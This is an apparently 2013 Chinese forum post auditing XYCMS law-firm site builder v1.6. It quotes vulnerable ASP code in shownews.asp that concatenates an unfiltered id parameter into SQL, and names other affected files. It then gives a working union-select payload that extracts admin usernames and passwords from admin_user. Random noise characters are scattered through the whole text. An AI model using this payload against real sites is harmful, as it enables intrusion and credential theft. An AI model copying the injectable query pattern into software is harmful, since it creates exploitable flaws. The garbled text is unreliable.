前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
. f I S2 R7 ~9 r6 ~! W: k* J + z) m- p I. \% t9 ~3 ]: U7 z: m
淫荡分割线" g( l# O4 ]" P5 S
--------------------------------------------------------
! ~1 F" v1 Z% F; @% ~7 V D9 k - _$ C2 ^ Y* q0 ?1 g0 I
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测) T* ~, y6 k, [1 r% r
源码地址:http://down.chinaz.com/soft/29233.htm$ \, J, t/ d! O; B
2 B6 U0 N* ?& @4 Q- Q漏洞文件:shownews.asp0 U' u8 P# C6 k5 m1 _! f% F
漏洞代码:7-13行% x7 t& I. j* C+ P$ n- h* m
- o2 l7 X D& j$ [
m2 M9 L' G' ~/ x' g/ e }<%
2 K% Z) k9 ^+ c$ X) z9 y7 yid=request.QueryString("id")
+ y9 P: a. m0 e8 K f
/ O/ W) E2 b9 j8 ~set snews=server.createobject("adodb.recordset") 7 w. O- z, ~0 W6 J# ]
exec="select * from [news] where id="&id
0 ?+ l* r, |$ z' Csnews.open exec,conn,1,1
, P" Z) r' g: @1 `; d%>
6 K |3 `! a( X; {: I " D8 \% e9 v% _0 Z8 ?7 x+ L+ J; w
) j( Y. \1 S1 c$ q& l什么过滤都没有 直造成注入9 J7 |' T. a# Q) c% ]# I1 R- b
4 f: S- w" c+ @9 A3 Q
注入点:http://127.0.0.1:99/shownews.asp?id=xx7 `0 v- Q; i7 u. S' I
( t( H! K( b6 u6 j3 H5 X4 d( ^9 x
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找" c& q% H3 d* u! d! ~
# v. y" _# M8 N
- S& T5 t4 C, h o+ y$ K$ Vexp: union select 1,admin,password,4,5,7 from admin_user) j0 x# _, B- U6 @
, ^0 T) Y! x# R |
发表于 2013-4-4 17:28:12
收藏
支持
反对